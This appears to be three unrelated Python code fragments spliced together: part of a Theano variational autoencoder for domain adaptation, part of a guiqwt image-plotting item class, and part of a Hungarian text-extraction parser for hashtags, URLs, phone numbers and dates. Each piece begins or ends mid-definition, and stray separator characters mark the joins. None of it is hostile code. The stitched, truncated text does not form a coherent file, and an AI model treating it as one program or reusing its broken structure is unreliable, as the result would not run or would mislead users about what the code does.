n_in = encoder2_struct.layer_dim[-1],
batch_size = batch_size
)
ay_dim = encoder2_struct.layer_dim[-1]
self.EC_ay_S_mu = self.Encoder2_mu.output_source
self.EC_ay_S_log_sigma = self.Encoder2_sigma.output_source
self.EC_ay_S_sigma = T.exp(self.EC_ay_S_log_sigma)
self.EC_ay_T_mu = self.Encoder2_mu.output_target
self.EC_ay_T_log_sigma = self.Encoder2_sigma.output_target
self.EC_ay_T_sigma = T.exp(self.EC_ay_T_log_sigma)
self.ay_S = self.EC_2_GSL_source.output;
self.ay_T = self.EC_2_GSL_target.output;
self.Encoder2_params = self.Encoder2_mu.params + self.Encoder2_sigma.params
#self.Encoder2_outputs = [("EC_ay_S_mu", self.EC_ay_S_mu), ("EC_ay_S_log_sigma", self.EC_ay_S_log_sigma), ("ay_S", self.ay_S),
# ("EC_ay_T_mu",self.EC_ay_T_mu), ("EC_ay_T_log_sigma",self.EC_ay_T_log_sigma), ("ay_T", self.ay_T)]
self.Encoder2_outputs = [self.EC_ay_S_mu, self.EC_ay_S_log_sigma, self.ay_S, self.EC_ay_T_mu, self.EC_ay_T_log_sigma, self.ay_T]
self.Encoder2_outputs_name = ["EC_ay_S_mu", "EC_ay_S_log_sigma", "ay_S", "EC_ay_T_mu", "EC_ay_T_log_sigma", "ay_T"]
#------------------------------------------------------------------------
#Decoder 1 Neural Network: present p_\theta(x_n | {z_1}_n, s_n)
zyd_source = T.concatenate([self.zy_S, d_source], axis=1)
zyd_target = T.concatenate([self.zy_T, d_target], axis=1)
self.Decoder1_mu = nn.NN_Block_0L(
rng=rng,
input_source=zyd_source,
input_target=zyd_target,
struct = decoder1_struct,
name='Decoder1_mu'
)
self.Decoder1_sigma = nn.NN_Block_0L(
rng=rng,
input_source=zyd_source,
input_target=zyd_target,
struct = decoder1_struct,
name='Decoder1_sigma'
)
'''
#Sample layer
self.DC_1_GSL_source = GaussianSampleLayer(
mu=self.Decoder1_mu.output_source,
log_sigma=self.Decoder1_sigma.output_source,
n_in = decoder1_struct.layer_dim[-1],
batch_size = batch_size
)
self.DC_1_GSL_target = GaussianSampleLayer(
mu=self.Decoder1_mu.output_target,
log_sigma=self.Decoder1_sigma.output_target,
n_in = decoder1_struct.layer_dim[-1],
batch_size = batch_size
)
'''
x_dim = decoder1_struct.layer_dim[-1]
self.DC_x_S_mu = self.Decoder1_mu.output_source
self.DC_x_S_log_sigma = self.Decoder1_sigma.output_source
self.DC_x_S_sigma = T.exp(self.DC_x_S_log_sigma)
self.DC_x_T_mu = self.Decoder1_mu.output_target
self.DC_x_T_log_sigma = self.Decoder1_sigma.output_target
self.DC_x_T_sigma = T.exp(self.DC_x_T_log_sigma)
#self.reconstructed_x_S = self.DC_1_GSL_source.output
#self.reconstructed_x_T = self.DC_1_GSL_target.output
self.Decoder1_params = self.Decoder1_mu.params + self.Decoder1_sigma.params
#self.Decoder1_outputs = [("DC_x_S_mu", self.DC_x_S_mu), ("DC_x_S_log_sigma", self.DC_x_S_log_sigma),
# ("DC_x_T_mu", self.DC_x_T_mu), ("DC_x_T_log_sigma", self.DC_x_T_log_sigma)]
self.Decoder1_outputs = [self.DC_x_S_mu, self.DC_x_S_log_sigma, self.DC_x_T_mu, self.DC_x_T_log_sigma]
self.Decoder1_outputs_name = ["DC_x_S_mu", "DC_x_S_log_sigma", "DC_x_T_mu", "DC_x_T_log_sigma"]
#------------------------------------------------------------------------
#Decoder 2 Neural Network: present p_\theta({z_y}_n | {a_y}_n, y_n)
ayy_source = T.concatenate([self.ay_S, label_source], axis=1)
ayy_target = T.concatenate([self.ay_T, self.y_T], axis=1)
self.Decoder2_mu = nn.NN_Block_0L(
rng=rng,
input_source=ayy_source,
input_target=ayy_target,
struct = decoder2_struct,
name='Decoder2_mu'
)
self.Decoder2_sigma = nn.NN_Block_0L(
rng=rng,
input_source=ayy_source,
input_target=ayy_target,
struct = decoder2_struct,
name='Decoder2_sigma'
)
self.DC_zy_S_mu = self.Decoder2_mu.output_source
self.DC_zy_S_log_sigma = self.Decoder2_sigma.output_source
self.DC_zy_S_sigma = T.exp(self.DC_zy_S_log_sigma)
self.DC_zy_T_mu = self.Decoder2_mu.output_target
self.DC_zy_T_log_sigma = self.Decoder2_sigma.output_target
self.DC_zy_T_sigma = T.exp(self.DC_zy_T_log_sigma)
self.Decoder2_params = self.Decoder2_mu.params + self.Decoder2_sigma.params
#self.Decoder2_outputs = [("DC_zy_S_mu", self.DC_zy_S_mu), ("DC_zy_S_log_sigma", self.DC_zy_S_log_sigma),
# ("DC_zy_T_mu", self.DC_zy_T_mu), ("DC_zy_T_log_sigma", self.DC_zy_T_log_sigma)]
self.Decoder2_outputs = [self.DC_zy_S_mu, self.DC_zy_S_log_sigma, self.DC_zy_T_mu, self.DC_zy_T_log_sigma]
self.Decoder2_outputs_name = ["DC_zy_S_mu", "DC_zy_S_log_sigma", "DC_zy_T_mu", "DC_zy_T_log_sigma"]
#19 20 21 22
#------------------------------------------------------------------------
# Error Function Set
# KL(q(zy)||p(zy)) -----------
self.KL_zy_source = er.KLGaussianGaussian(self.EC_zy_S_mu, self.EC_zy_S_log_sigma, self.DC_zy_S_mu, self.DC_zy_S_log_sigma)
self.KL_zy_target = er.KLGaussianGaussian(self.EC_zy_T_mu, self.EC_zy_T_log_sigma, self.DC_zy_T_mu, self.DC_zy_T_log_sigma)
# KL(q(ay)||p(ay)) -----------
self.KL_ay_source = er.KLGaussianStdGaussian(self.EC_ay_S_mu, self.EC_ay_S_log_sigma)
self.KL_ay_target = er.KLGaussianStdGaussian(self.EC_ay_T_mu, self.EC_ay_T_log_sigma)
# KL(q(y)||p(y)) only target data-----------
# prior of y is set to 1/K, K is category number
threshold = 0.0000001
pi_0 = T.ones([batch_size, y_dim], dtype=theano.config.floatX) / y_dim
self.KL_y_target = T.sum(- self.EC_y_T_pi * T.log( T.maximum(self.EC_y_T_pi / pi_0, threshold)), axis=1)
# Likelihood q(y) only source data-----------
self.LH_y_source = - T.sum(- label_source * T.log( T.maximum(self.EC_y_S_pi, threshold)), axis=1)
#self.LH_y_source = T.nnet.nnet.categorical_crossentropy(self.EC_y_S_pi, label_source)
# Likelihood p(x) ----------- if gaussian
self.LH_x_source = er.LogGaussianPDF(input_source, self.DC_x_S_mu, self.DC_x_S_log_sigma)
self.LH_x_target = er.LogGaussianPDF(input_target, self.DC_x_T_mu, self.DC_x_T_log_sigma)
#self.LH_x_source = - T.nnet.binary_crossentropy(self.reconstructed_x_S, input_source)
#self.LH_x_target = - T.nnet.binary_crossentropy(self.reconstructed_x_T, input_target)
# MMD betwween s, x using gaussian kernel-----------
#self.MMD = MMD(self.zy_S, self.zy_T, batch_size)
self.MMD = er.MMDEstimator(rng, self.zy_S, self.zy_T, zy_dim, batch_size, D)
#Cost function
tmp = self.KL_zy_source + self.KL_zy_target + self.KL_ay_source + self.KL_ay_target \
+ self.LH_x_source + self.LH_x_target + self.KL_y_target + self.LH_y_source * alpha
self.cost = -tmp.mean() + self.MMD * beta
# the parameters of the model
self.params = self.Encoder1_params + self.Encoder2_params + self.Encoder3_params + self.Decoder1_params + self.Decoder2_params
# all output of VAE
self.outputs = self.Encoder1_outputs + self.Encoder2_outputs + self.Encoder3_outputs + self.Decoder1_outputs + self.Decoder2_outputs
self.outputs_name = self.Encoder1_outputs_name + self.Encoder2_outputs_name + self.Encoder3_outputs_name \
+ self.Decoder1_outputs_name + self.Decoder2_outputs_name
# keep track of model input
self.input_source = input_source
self.input_target = input_target
#Predict Label
self.y_pred_source = T.argmax(self.EC_y_S_pi, axis=1)
self.y_pred_target = T.argmax(self.EC_y_T_pi, axis=1)
def source_predict_raw(self):
return self.EC_y_S_pi
def target_predict_raw(self):
return self.EC_y_T_pi
def source_predict(self):
return self.y_pred_source
def target_predict(self):
return self.y_pred_target
def source_errors(self, y):
#Classification Error
return T.mean(T.neq(self.y_pred_source, T.argmax(y, axis=1)))
def target_errors(self, y):
#Classification Error
return T.mean(T.neq(self.y_pred_target, T.argmax(y, axis=1)))
def output_variance(self):
EC_zy_S = T.mean(T.sum(self.EC_zy_S_log_sigma, axis=1))
EC_zy_T = T.mean(T.sum(self.EC_zy_T_log_sigma, axis=1))
EC_ay_S = T.mean(T.sum(self.EC_ay_S_log_sigma, axis=1))
EC_ay_T = T.mean(T.sum(self.EC_ay_T_log_sigma, axis=1))
DC_zy_S = T.mean(T.sum(self.DC_zy_S_log_sigma, axis=1))
DC_zy_T = T.mean(T.sum(self.DC_zy_T_log_sigma, axis=1))
DC_x_S = T.mean(T.sum(self.DC_x_S_log_sigma, axis=1))
DC_x_T = T.mean(T.sum(self.DC_x_T_log_sigma, axis=1))
return [EC_zy_S, EC_zy_T, EC_ay_S, EC_ay_T, DC_zy_S, DC_zy_T, DC_x_S, DC_x_T]
'''
def outputs_mean(self):
for i in range(len(self.outputs)):
result[i] = T.mean(self.outputs[i])
return result
def cost(self):
alpha = 1
beta = 0.01
tmp = self.KL_zy_source + self.KL_zy_target + self.KL_ay_source + self.KL_ay_target \
+ self.LH_x_source + self.LH_x_target + self.KL_y_target + self.LH_y_source * alpha
return -tmp.mean() + self.MMD * beta
'''
################################################################################################################
################################################################################################################
'''Model Definition/Construct'''
class Supervised_VFAE(object):
"""
The semi-supervised model Domain-Adversial Variational Autoencoder
To deal with the semi-supervised model that source, target domain data will walk though same path. Use shared layer idea by copy the weight
The domain label s will constuct inside this class
For abbreviation: HL refer to hiddenlayer, GSL refer to Gaussian Sample Layer, CSL refer to Cat Sample Layer
Encoder refer to Encoder NN, Decoder refer to Decoder NN
"""
def __init__(self, rng, input_source, input_target, label_source, label_target, batch_size,
encoder1_struct, encoder2_struct, encoder3_struct, decoder1_struct, decoder2_struct, alpha, beta, D):
"""Initialize the parameters for the multilayer perceptron
:type | |
24
self.bg_qcolor = qcolor
a, b, _bg, cmap = self.lut
if qcolor is None:
self.lut = (a, b, None, cmap)
else:
self.lut = (a, b, np.uint32(QColor(qcolor).rgb() & 0xFFFFFF), cmap)
def set_color_map(self, name_or_table):
if name_or_table is self.cmap_table:
# This avoids rebuilding the LUT all the time
return
if is_text_string(name_or_table):
table = get_cmap(name_or_table)
else:
table = name_or_table
self.cmap_table = table
self.cmap = table.colorTable(FULLRANGE)
cmap_a = self.lut[3]
alpha = self.imageparam.alpha
alpha_mask = self.imageparam.alpha_mask
for i in range(LUT_SIZE):
if alpha_mask:
pix_alpha = alpha * (i / float(LUT_SIZE - 1))
else:
pix_alpha = alpha
alpha_channel = max(min(np.uint32(255 * pix_alpha + 0.5), 255), 0) << 24
cmap_a[i] = (
np.uint32((table.rgb(FULLRANGE, i / LUT_MAX)) & 0xFFFFFF)
| alpha_channel
)
plot = self.plot()
if plot:
plot.update_colormap_axis(self)
def get_color_map(self):
return self.cmap_table
def get_color_map_name(self):
return get_cmap_name(self.get_color_map())
def set_interpolation(self, interp_mode, size=None):
"""
Set image interpolation mode
interp_mode: INTERP_NEAREST, INTERP_LINEAR, INTERP_AA
size (integer): (for anti-aliasing only) AA matrix size
"""
if interp_mode in (INTERP_NEAREST, INTERP_LINEAR):
self.interpolate = (interp_mode,)
if interp_mode == INTERP_AA:
aa = np.ones((size, size), self.data.dtype)
self.interpolate = (interp_mode, aa)
def get_interpolation(self):
"""Get interpolation mode"""
return self.interpolate
def set_lut_range(self, lut_range):
"""
Set LUT transform range
*lut_range* is a tuple: (min, max)
"""
self.min, self.max = lut_range
_a, _b, bg, cmap = self.lut
if self.max == self.min:
self.lut = (LUT_MAX, self.min, bg, cmap)
else:
fmin, fmax = float(self.min), float(self.max) # avoid overflows
self.lut = (
LUT_MAX / (fmax - fmin),
-LUT_MAX * fmin / (fmax - fmin),
bg,
cmap,
)
def get_lut_range(self):
"""Return the LUT transform range tuple: (min, max)"""
return self.min, self.max
def get_lut_range_full(self):
"""Return full dynamic range"""
return _nanmin(self.data), _nanmax(self.data)
def get_lut_range_max(self):
"""Get maximum range for this dataset"""
kind = self.data.dtype.kind
if kind in np.typecodes["AllFloat"]:
info = np.finfo(self.data.dtype)
else:
info = np.iinfo(self.data.dtype)
return info.min, info.max
def update_border(self):
"""Update image border rectangle to fit image shape"""
bounds = self.boundingRect().getCoords()
self.border_rect.set_rect(*bounds)
def draw_border(self, painter, xMap, yMap, canvasRect):
"""Draw image border rectangle"""
self.border_rect.draw(painter, xMap, yMap, canvasRect)
def draw_image(self, painter, canvasRect, src_rect, dst_rect, xMap, yMap):
"""
Draw image with painter on canvasRect
.. warning::
`src_rect` and `dst_rect` are coordinates tuples
(xleft, ytop, xright, ybottom)
"""
dest = _scale_rect(
self.data, src_rect, self._offscreen, dst_rect, self.lut, self.interpolate
)
qrect = QRectF(QPointF(dest[0], dest[1]), QPointF(dest[2], dest[3]))
painter.drawImage(qrect, self._image, qrect)
def export_roi(
self,
src_rect,
dst_rect,
dst_image,
apply_lut=False,
apply_interpolation=False,
original_resolution=False,
):
"""Export Region Of Interest to array"""
if apply_lut:
a, b, _bg, _cmap = self.lut
else:
a, b = 1.0, 0.0
interp = self.interpolate if apply_interpolation else (INTERP_NEAREST,)
_scale_rect(self.data, src_rect, dst_image, dst_rect, (a, b, None), interp)
# ---- QwtPlotItem API -----------------------------------------------------
def draw(self, painter, xMap, yMap, canvasRect):
x1, y1, x2, y2 = canvasRect.getCoords()
i1, i2 = xMap.invTransform(x1), xMap.invTransform(x2)
j1, j2 = yMap.invTransform(y1), yMap.invTransform(y2)
xl, yt, xr, yb = self.boundingRect().getCoords()
dest = (
xMap.transform(xl),
yMap.transform(yt),
xMap.transform(xr) + 1,
yMap.transform(yb) + 1,
)
W = canvasRect.right()
H = canvasRect.bottom()
if self._offscreen.shape != (H, W):
self._offscreen = np.empty((H, W), np.uint32)
self._image = QImage(self._offscreen, W, H, QImage.Format_ARGB32)
self._image.ndarray = self._offscreen
self.notify_new_offscreen()
self.draw_image(painter, canvasRect, (i1, j1, i2, j2), dest, xMap, yMap)
self.draw_border(painter, xMap, yMap, canvasRect)
def boundingRect(self):
return self.bounds
def notify_new_offscreen(self):
# callback for those derived classes who need it
pass
def setVisible(self, enable):
if not enable:
self.unselect() # when hiding item, unselect it
if enable:
self.border_rect.show()
else:
self.border_rect.hide()
QwtPlotItem.setVisible(self, enable)
# ---- IBasePlotItem API ----------------------------------------------------
def types(self):
return (
IImageItemType,
IVoiImageItemType,
IColormapImageItemType,
ITrackableItemType,
ICSImageItemType,
IExportROIImageItemType,
IStatsImageItemType,
IStatsImageItemType,
)
def set_readonly(self, state):
"""Set object readonly state"""
self._readonly = state
def is_readonly(self):
"""Return object readonly state"""
return self._readonly
def set_private(self, state):
"""Set object as private"""
self._private = state
def is_private(self):
"""Return True if object is private"""
return self._private
def select(self):
"""Select item"""
self.selected = True
self.border_rect.select()
def unselect(self):
"""Unselect item"""
self.selected = False
self.border_rect.unselect()
def is_empty(self):
"""Return True if item data is empty"""
return self.data is None or self.data.size == 0
def set_selectable(self, state):
"""Set item selectable state"""
self._can_select = state
def set_resizable(self, state):
"""Set item resizable state
(or any action triggered when moving an handle, e.g. rotation)"""
self._can_resize = state
def set_movable(self, state):
"""Set item movable state"""
self._can_move = state
def set_rotatable(self, state):
"""Set item rotatable state"""
self._can_rotate = state
def can_select(self):
return self._can_select
def can_resize(self):
return self._can_resize
def can_move(self):
return self._can_move
def can_rotate(self):
return self._can_rotate
def hit_test(self, pos):
plot = self.plot()
ax = self.xAxis()
ay = self.yAxis()
return self.border_rect.poly_hit_test(plot, ax, ay, pos)
def update_item_parameters(self):
pass
def get_item_parameters(self, itemparams):
itemparams.add("ShapeParam", self, self.border_rect.shapeparam)
def set_item_parameters(self, itemparams):
self.border_rect.set_item_parameters(itemparams)
def move_local_point_to(self, handle, pos, ctrl=None):
"""Move a handle as returned by hit_test to the new position pos
ctrl: True if <Ctrl> button is being pressed, False otherwise"""
pass
def move_local_shape(self, old_pos, new_pos):
"""Translate the shape such that old_pos becomes new_pos
in canvas coordinates"""
pass
def move_with_selection(self, delta_x, delta_y):
"""
Translate the shape together with other selected items
delta_x, delta_y: translation in plot coordinates
"""
pass
# ---- IBaseImageItem API --------------------------------------------------
def can_setfullscale(self):
return True
def can_sethistogram(self):
return False
def get_histogram(self, nbins):
"""interface de IHistDataSource"""
if self.data is None:
return [0,], [0, 1]
if self.histogram_cache is None or nbins != self.histogram_cache[0].shape[0]:
# from guidata.utils import tic, toc
if True:
# tic("histo1")
res = np.histogram(self.data, nbins)
# toc("histo1")
else:
# TODO: _histogram is faster, but caching is buggy
# in this version
# tic("histo2")
_min = _nanmin(self.data)
_max = _nanmax(self.data)
if self.data.dtype in (np.float64, np.float32):
bins = np.unique(
np.array(
np.linspace(_min, _max, nbins + 1), dtype=self.data.dtype
)
)
else:
bins = np.arange(_min, _max + 2, dtype=self.data.dtype)
res2 = np.zeros((bins.size + 1,), np.uint32)
_histogram(self.data.flatten(), bins, res2)
# toc("histo2")
res = res2[1:-1], bins
self.histogram_cache = res
else:
res = self.histogram_cache
return res
def __process_cross_section(self, ydata, apply_lut):
if apply_lut:
a, b, bg, cmap = self.lut
return (ydata * a + b).clip(0, LUT_MAX)
else:
return ydata
def get_stats(self, x0, y0, x1, y1):
"""Return formatted string with stats on image rectangular area
(output should be compatible with AnnotatedShape.get_infos)"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
data = self.data[iy0:iy1, ix0:ix1]
xfmt = self.imageparam.xformat
yfmt = self.imageparam.yformat
zfmt = self.imageparam.zformat
return "<br>".join(
[
"<b>%s</b>" % self.imageparam.label,
"%sx%s %s"
% (self.data.shape[1], self.data.shape[0], str(self.data.dtype)),
"",
"%s ≤ x ≤ %s" % (xfmt % x0, xfmt % x1),
"%s ≤ y ≤ %s" % (yfmt % y0, yfmt % y1),
"%s ≤ z ≤ %s" % (zfmt % data.min(), zfmt % data.max()),
"‹z› = " + zfmt % data.mean(),
"σ(z) = " + zfmt % data.std(),
]
)
def get_xsection(self, y0, apply_lut=False):
"""Return cross section along x-axis at y=y0"""
_ix, iy = self.get_closest_indexes(0, y0)
return (
self.get_x_values(0, self.data.shape[1]),
self.__process_cross_section(self.data[iy, :], apply_lut),
)
def get_ysection(self, x0, apply_lut=False):
"""Return cross section along y-axis at x=x0"""
ix, _iy = self.get_closest_indexes(x0, 0)
return (
self.get_y_values(0, self.data.shape[0]),
self.__process_cross_section(self.data[:, ix], apply_lut),
)
def get_average_xsection(self, x0, y0, x1, y1, apply_lut=False):
"""Return average cross section along x-axis"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
ydata = self.data[iy0:iy1, ix0:ix1].mean(axis=0)
return (
self.get_x_values(ix0, ix1),
self.__process_cross_section(ydata, apply_lut),
)
def get_average_ysection(self, x0, y0, x1, y1, apply_lut=False):
"""Return average cross section along y-axis"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
ydata = self.data[iy0:iy1, ix0:ix1].mean(axis=1)
return (
self.get_y_values(iy0, iy1),
self.__process_cross_section(ydata, apply_lut),
)
assert_interfaces_valid(BaseImageItem)
# ==============================================================================
# Raw Image item (image item without scale)
# ==============================================================================
class RawImageItem(BaseImageItem):
"""
Construct a simple image item
* data: 2D NumPy array
* param (optional): image parameters
(:py:class:`guiqwt.styles.RawImageParam` instance)
"""
__implements__ = (
IBasePlotItem,
IBaseImageItem,
IHistDataSource,
IVoiImageItemType,
ISerializableType,
)
# ---- BaseImageItem API ---------------------------------------------------
def get_default_param(self):
"""Return instance of the default imageparam DataSet"""
return RawImageParam(_("Image"))
# ---- Serialization methods -----------------------------------------------
def __reduce__(self):
fname = self.get_filename()
if fname is None:
fn_or_data = self.data
else:
fn_or_data = fname
state = self.imageparam, self.get_lut_range(), fn_or_data, self.z()
res = (self.__class__, (), state)
return res
def __setstate__(self, state):
param, lut_range, fn_or_data, z = state
self.imageparam = param
if is_text_string(fn_or_data):
self.set_filename(fn_or_data)
self.load_data()
elif fn_or_data is not None: # should happen only with previous API
self.set_data(fn_or_data)
self.set_lut_range(lut_range)
self.setZ(z)
self.imageparam.update_image(self)
def serialize(self, writer):
"""Serialize object to HDF5 writer"""
fname = self.get_filename()
load_from_fname = fname is not | |
+ 'stem']) + r')' + boundary, None, text)
if stem_matches:
if len(matches) <= len(stem_matches):
return (False, 0)
return (True, (len(matches) - len(stem_matches)) * item[select + 'score'])
return (True, len(matches) * item[select + 'score'])
if delete:
return text
return (False, 0)
# Extract Class
class Extract:
##### CONSTRUCTOR #####
def __init__(self, text=''):
if not isinstance(text, str):
raise ValueError('Constructor only accepts strings.')
elif text:
self.text = text
self.ntext = self._convert_numbers(self.text)
self._text_ = ' ' + self.text + ' ' # some complex regular expressions were easier to write for padded text
self._ntext_ = ' ' + self.ntext + ' ' # some complex regular expressions were easier to write for padded text
##### DATA MODEL #####
def __repr__(self):
return "<Lara Extract Parser instance at {0}>".format(hex(id(self)))
def __str__(self):
return self.text
def __len__(self):
return len(self.text)
def __eq__(self, other):
if self.__class__.__name__ == other.__class__.__name__:
return (self.text == other.text)
elif isinstance(other, bool):
return (len(self.text) != 0) == other
elif isinstance(other, str):
return self.text == other
return False
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
if other:
if self.__class__.__name__ == other.__class__.__name__:
self.text += other.text
elif isinstance(other, str):
self.text += other
self._text_ = ' ' + self.text + ' '
self.ntext = self._convert_numbers(self.text)
self._ntext_ = ' ' + self.ntext + ' '
return self
return self
##### CLASS FUNCTIONS #####
# extract list #hashtags from text
def hashtags(self, normalize=True):
if self.text:
matches = _re.findall(r'#([\w\d]+(?:[\w\d_\-\']+[\w\d]+)+)\b', None, self.text)
if normalize:
return ['#{0}'.format(hashtag.lower()) for hashtag in matches]
else:
return ['#{0}'.format(hashtag) for hashtag in matches]
return []
# extract list of @hashtags from text
def mentions(self):
if self.text:
return _re.findall(r'(?<![\w\d\_])(\@[\w\d_]+(?:[\w\d_\-\'\.]+[\w\d_]+)+)\b', None, self._text_)
return []
# extract list of http://urls/ from text
def urls(self):
if self.text:
return _re.findall(
r'\b((?:https?\:[\/\\]{2}(?:w{3}\.)?|(?:w{3}\.))(?:[\w\d_\-]+\.\w{2,})(?:[\/\\](?:[\w\d\-_]+[\/\\]?)*)?(?:\?[^\s]*)?(?:\#[^\s]+)?)',
re.IGNORECASE, self.text)
return []
# extract list of smileys :) from text
def smileys(self):
if self.text:
return _re.findall(r'(?:[\:\;\=]\-*[DdXxCc\|\[\]\(\)3]+[89]*)|(?:[\(\)D\[\]\|]+\-*[\:\;\=])', None,
self.text)
return []
# extract digits with n places
def digits(self, n=0, normalize=True, convert=True):
results = []
if self.text:
matches = _re.findall(r'((?:\d[\-\.\,\s]?)+)', re.IGNORECASE, self.ntext if convert else self.text)
for item in matches:
original = item
item = lara.nlp.trim(''.join(e for e in item if e.isdigit()))
if n <= 0 or len(item) == n:
if normalize:
results.append(item)
else:
results.append(original.strip())
return results
# extract (decimal) numbers
def numbers(self, decimals=True, convert=True):
if self.text:
if decimals:
matches = _re.findall(
r'(?<!\d)(?<!\-)(?<!\:)((?:\-\s?)?(?:(?:\d\s?)+(?:[\.\,]\d+[^\.\,])?|(?:[\.\,]\d+[^\.\,\:]))[\-\:]?)',
re.IGNORECASE, self._ntext_ if convert else self._text_)
okay = []
for item in matches:
if item[-1] not in ('-', ':'):
item = item.replace(',', '.')
if not item[-1].isnumeric():
item = item[:-1]
if item[0] == '-':
if item[1] == '.':
item = '-0' + item[1:]
elif not item[0].isnumeric():
item = item[1:]
item = ''.join([char for char in item if char != ' '])
try:
correct = float(item)
okay.append(correct)
except:
pass
return okay
else:
matches = _re.findall(r'(?<!\d\-)(?<![\.\,\d])(\-?(?:\d\s?)+(?![\.\,]\d))[^\d\-\:]+', re.IGNORECASE,
self._ntext_ if convert else self._text_)
okay = [item for item in matches if item and item[-1] not in ('-', ':')]
return [int(''.join(number.strip().split())) for number in okay]
return []
# extract percentages
def percentages(self, normalize=True):
if self.text:
if normalize:
matches = _re.findall(r'((?:\d+(?:[\,\.]\d+)?|[\,\.]\d+))\s?(?:\%|sz[aá]zal[eé]k)', re.IGNORECASE,
self.text)
results = []
for item in matches:
item = item.replace(',', '.')
if item.startswith('.'):
item = '0' + item
if '.' in item:
places = len(item.split('.')[1]) + 2
else:
places = 2
item = str("{:." + str(places) + "f}").format(float(item) / 100.00)
results.append(float(item))
return results
else:
return _re.findall(r'((?:\d+(?:[\,\.]\d+)?|[\,\.]\d+)\s?(?:\%|sz[aá]zal[eé]k))', re.IGNORECASE,
self.text)
return []
# extract phone numbers
def phone_numbers(self, normalize=True, convert=True):
results = []
if self.text:
matches = _re.findall(
r'((?:\(?(?:\+36|0036|06)[\s\-\\\/]?)?\(?\d{1,2}\)?[\s\-\\\/]?\d(?:\d[\s\-\\\/]?){5}\d)', re.IGNORECASE,
self.ntext if convert else self.text)
if not normalize:
return matches
for item in matches:
item = lara.nlp.trim(''.join(e for e in item if e.isdigit()))
if item.startswith('36') or item.startswith('06'):
item = item[2:]
elif item.startswith('0036'):
item = item[4:]
if len(item) == 8:
item = item[0] + ' ' + item[1:]
else:
item = item[0:2] + ' ' + item[2:]
results.append('+36 ' + item)
return results
# extract list of common Hungarian date formats from text without further processing them
def dates(self, normalize=True, convert=True, current=False):
results = []
if self.text:
if current:
now = datetime.datetime.strptime(current, "%Y-%m-%d")
else:
now = datetime.datetime.now()
matches = _re.findall(
r'((\d{2})?(\d{2}([\\\/\.\-]\s?|\s))([eé]v\s?)?(\d{1,2}([\\\/\.\-]\s?|\s)(h[oó](nap)?\s?)?)?(\d{1,2}))\W*([aáeéio][ikn]|nap)?\b',
re.IGNORECASE, self.text)
for item in matches:
match = re.sub('([eé]v|h[oó]|nap)', '', item[0])
parts = list(filter(None, re.split(r'\W', match + '-')))
if len(parts) == 3:
if int(parts[1]) <= 12:
if normalize:
if len(parts[0]) == 4:
results.append(parts[0] + '-' + parts[1].zfill(2) + '-' + parts[2].zfill(2))
else:
results.append('20' + parts[0] + '-' + parts[1].zfill(2) + '-' + parts[2].zfill(2))
else:
results.append(item[0])
elif len(parts) == 2:
if normalize:
if len(parts[0]) == 4:
results.append(parts[0] + '-' + parts[1].zfill(2) + '-??')
elif int(parts[0]) > 12:
results.append('20' + parts[0] + '-' + parts[1].zfill(2) + '-??')
else:
results.append(str(now.year) + '-' + parts[0].zfill(2) + '-' + parts[1].zfill(2))
else:
results.append(item[0])
matches = _re.findall(
r'\b((\d{2}(\d{2})?\W{1,2})?((jan|feb|m[aá]r|[aá]pr|m[aá]j|j[uú][nl]|aug|sz?ep|okt|nov|dec)\w{0,10}\W{1,2}|[ivx]{1,4}\W{0,2})(h[aoó][nv]?\w{0,7}\W{1,2})?(\d{1,2})?\W?\w*)\b',
re.IGNORECASE, self.ntext if convert else self.text)
for item in matches:
match = item[0].lower()
year = ''
day = ''
switch = False
for char in match:
if switch:
if char.isdigit():
day += char
else:
if char.isdigit():
year += char
else:
switch = True
if not year and not day:
continue
if not year:
year = str(now.year)
elif len(year) == 2:
year = '20' + year
if not day:
day = '??'
elif len(day) == 1:
day = '0' + day
month = ''
if 'jan' in match:
month = '01'
elif 'feb' in match:
month = '02'
elif 'mar' in match or 'már' in match:
month = '03'
elif 'apr' in match or 'ápr' in match:
month = '04'
elif 'maj' in match or 'máj' in match:
month = '05'
elif 'jun' in match or 'jún' in match:
month = '06'
elif 'jul' in match or 'júl' in match:
month = '07'
elif 'aug' in match:
month = '08'
elif 'sep' in match or 'szep' in match:
month = '09'
elif 'okt' in match:
month = '10'
elif 'nov' in match:
month = '11'
elif 'dec' in match:
month = '12'
else:
roman = ''
for char in match:
if char in ('i', 'v', 'x'):
roman += char
elif roman and char.isnumeric():
break
elif roman and char.isalpha():
roman = ''
break
if not roman:
continue
if 'v' in roman:
if roman.startswith('v'):
month = str(4 + len(roman)).zfill(2)
else:
month = str(6 - len(roman)).zfill(2)
elif 'x' in roman:
if roman.startswith('x'):
month = str(9 + len(roman)).zfill(2)
else:
month = str(11 - len(roman)).zfill(2)
else:
month = str(len(roman)).zfill(2)
if month and month != '00' and len(day) <= 2:
if normalize:
results.append(year + '-' + month + '-' + day)
else:
results.append(item[0])
if not results:
matches = _re.findall(r'\b(?<!\-)([0123]?\d)[\.\-aáeéint]+(?![kloópr])', re.IGNORECASE,
self.ntext if convert else self.text)
for item in matches:
if int(item) <= 31:
if normalize:
year = str(now.year)
month = str(now.month).zfill(2)
day = item.zfill(2)
results.append(year + '-' + month + '-' + day)
else:
results.append(item)
return results
# extract times like 12:00 or délután 4
def times(self, normalize=True, convert=True, current=False):
if self.text:
matches = _re.findall(
